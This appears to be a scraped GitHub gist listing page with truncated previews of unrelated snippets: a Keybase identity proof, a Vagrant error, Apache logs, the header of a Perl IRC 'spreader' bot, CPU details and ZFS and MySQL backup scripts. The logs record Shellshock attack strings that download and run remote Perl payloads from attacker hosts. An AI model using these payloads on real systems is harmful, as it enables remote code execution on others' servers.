I hereby claim:
- I am tlongren on github.
- I am tlongren (https://keybase.io/tlongren) on keybase.
- I have a public key whose fingerprint is 3F11 4E99 6D27 AC2B 870E B372 4B31 6E44 7ADA 843A
To claim this, I am signing this object:
| tyler@x55c:~/Desktop/Git/scotch-box$ vagrant up | |
| Bringing machine 'default' up with 'virtualbox' provider... | |
| There are errors in the configuration of this machine. Please fix | |
| the following errors and try again: | |
| vm: | |
| * The box 'scotch/box' could not be found. | |
| tyler@x55c:~/Desktop/Git/scotch-box$ |
| Oct 20 05:22:59 longren httpd: Oct 20 06:22:59 longren.io apache 80.241.209.165 - - [20/Oct/2014:06:22:59 -0400] "GET /cgi-bin/bit.cgi HTTP/1.0"301 - "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://184.171.247.165/ji ; lwp-download http://184.171.247.165/ji ; curl -O /var/tmp/jiw http://184.171.247.165/ji ; perl /var/tmp/ji ; rm -rf *ji\"" | |
| Oct 20 05:23:00 longren httpd: Oct 20 06:22:59 longren.io apache 80.241.209.165 - - [20/Oct/2014:06:22:59 -0400] "GET /cgi-bin/bit.cgi HTTP/1.0"404 55163 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://184.171.247.165/ji ; lwp-download http://184.171.247.165/ji ; curl -O /var/tmp/jiw http://184.171.247.165/ji ; perl /var/tmp/ji ; rm -rf *ji\"" | |
| Oct 20 08:16:34 longren httpd: Oct 20 09:16:34 longren.io apache 65.254.63.146 - - [20/Oct/2014:09:16:34 -0400] "GET / HTTP/1.0"301 292 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" | |
| Oct 20 |
| #!/usr/bin/perl | |
| # this spreader is coded by xdh | |
| # xdh@xxxxxxxxxxx | |
| # only for testing... | |
| my @nickname = ("|PHP|"); | |
| my $nick = $nickname[rand scalar @nickname]; | |
| my $ircname = $nickname[rand scalar @nickname]; |
I hereby claim:
To claim this, I am signing this object:
| processor : 0 | |
| vendor_id : GenuineIntel | |
| cpu family : 6 | |
| model : 23 | |
| model name : Intel(R) Xeon(R) CPU X5450 @ 3.00GHz | |
| stepping : 10 | |
| microcode : 0xa0b | |
| cpu MHz : 1998.000 | |
| cache size : 6144 KB | |
| physical id : 0 |
| #!/bin/bash | |
| TS=$(date "+%Y%m%d-%H%M%S") | |
| SNAP=zpool/mysql@${TS} | |
| zfs snapshot $SNAP | |
| zfs send $SNAP | pv | xz -z | ssh somewhere "cat > /mnt/snapshots/mysql-${TS}.xz" | |
| zfs destroy -Rv $SNAP |
| #!/bin/sh | |
| rightnow=`date +%Y-%m-%d_%H-%M-%S` | |
| /usr/bin/mysqldump -uroot -pyourpasswordfornoprompt --opt --all-databases --single-transaction | bzip2 -cq9 > /home/tyler/mysql-backups/full-$rightnow.sql.bz2 |
#Adding a New Issue
##Results
| tyler@echo:~$ ping 8.8.8.8 | |
| PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. | |
| 64 bytes from 8.8.8.8: icmp_seq=1 ttl=46 time=2043 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=2 ttl=46 time=1959 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=3 ttl=46 time=2028 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=4 ttl=46 time=1961 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=5 ttl=46 time=1692 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=6 ttl=46 time=1759 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=7 ttl=46 time=1806 ms | |
| 64 bytes from 8.8.8.8: icmp_seq=8 ttl=46 time=1795 ms |